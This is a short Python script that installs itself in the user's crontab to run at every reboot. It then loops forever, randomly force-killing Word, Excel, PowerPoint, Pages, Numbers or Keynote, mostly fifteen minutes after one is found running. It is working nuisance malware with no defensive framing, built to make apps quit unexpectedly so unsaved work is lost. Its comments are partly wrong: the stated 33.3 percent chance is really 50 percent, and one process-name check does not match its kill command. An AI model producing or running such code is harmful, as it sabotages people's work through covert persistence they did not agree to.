#!/usr/bin/env python3
import os
import subprocess
import time
import random

cronJobs	= subprocess.check_output("crontab -l", shell = True)										# jobs stored in cron
activeUser	= str(subprocess.check_output("whoami", shell = True))[2:-3]								# the active user
psCommand	= ("ps -u " + activeUser)																	# command to check running processes

def go():
	while 7 == 7:
		processes = str(subprocess.check_output(psCommand, shell = True))								# check running processes
		doIt = random.randrange(0, 2)																	# gen no between 0 and 2
		if doIt == 0:																					# If doIt is 0 (33.3 percent of the time)
			if "Word" in processes:
				time.sleep(900)																			# wait 15 mins
				os.system("pkill Word")																	# force quit Word
			elif "Pages" in processes:
				#time.sleep(900)
				os.system("pkill Pages")
			elif "Excel" in processes:
				time.sleep(900)
				os.system("pkill Excel")
			elif "Numbers" in processes:
				time.sleep(900)
				os.system("pkill Numbers")
			elif "Powerpoint" in processes:
				time.sleep(900)
				os.system("pkill PowerPoint")
			elif "Keynote" in processes:
				time.sleep(900)
				os.system("pkill Keynote")


if os.path.realpath(__file__) in str(cronJobs):															# already in cron
	go()
else:																									# not in cron
	os.system("(crontab -l; echo \"@reboot " + os.path.realpath(__file__) + "\" ) | crontab -")												# add script to cron
	go()